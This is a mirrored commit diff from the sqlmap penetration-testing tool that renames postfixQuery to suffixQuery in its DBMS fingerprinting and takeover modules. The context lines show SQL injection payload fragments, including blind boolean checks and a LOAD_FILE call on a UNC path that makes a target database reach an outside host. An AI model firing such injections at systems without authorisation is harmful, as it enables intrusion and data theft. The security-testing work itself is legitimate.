mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-07 05:01:30 +00:00
Proper english (--postfix is now --suffix) and --string/--regexp does not necessarily need to match into the original response body, it might well be in the injected True condition only!
This commit is contained in:
Bernardo Damele
@@ -41,7 +41,7 @@ class Fingerprint(GenericFingerprint):
|
||||
table = "MSysAccessStorage"
|
||||
if table:
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
retVal = "not sandboxed" if result else "sandboxed"
|
||||
@@ -71,7 +71,7 @@ class Fingerprint(GenericFingerprint):
|
||||
table = table[1:]
|
||||
randInt = randomInt()
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
if result is None:
|
||||
@@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint):
|
||||
randInt = randomInt()
|
||||
randStr = randomStr()
|
||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
page = Request.queryPage(payload, content=True)
|
||||
|
||||
|
||||
@@ -35,7 +35,7 @@ class Fingerprint(GenericFingerprint):
|
||||
logger.info(infoMsg)
|
||||
|
||||
query = agent.prefixQuery("/* NoValue */")
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
@@ -49,7 +49,7 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
for version in [6, 7]:
|
||||
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
@@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
|
||||
|
||||
for version in xrange(0, 10):
|
||||
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
||||
@@ -36,7 +36,7 @@ class Fingerprint(GenericFingerprint):
|
||||
logger.info(infoMsg)
|
||||
|
||||
query = agent.prefixQuery("/* NoValue */")
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
@@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
|
||||
randInt = randomInt()
|
||||
version = getUnicode(version)
|
||||
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
|
||||
@@ -102,7 +102,7 @@ class Takeover(GenericTakeover):
|
||||
def uncPathRequest(self):
|
||||
if not kb.stackedTest:
|
||||
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
||||
query = agent.postfixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
|
||||
Request.queryPage(payload)
|
||||
|
||||
Reference in New Issue
Block a user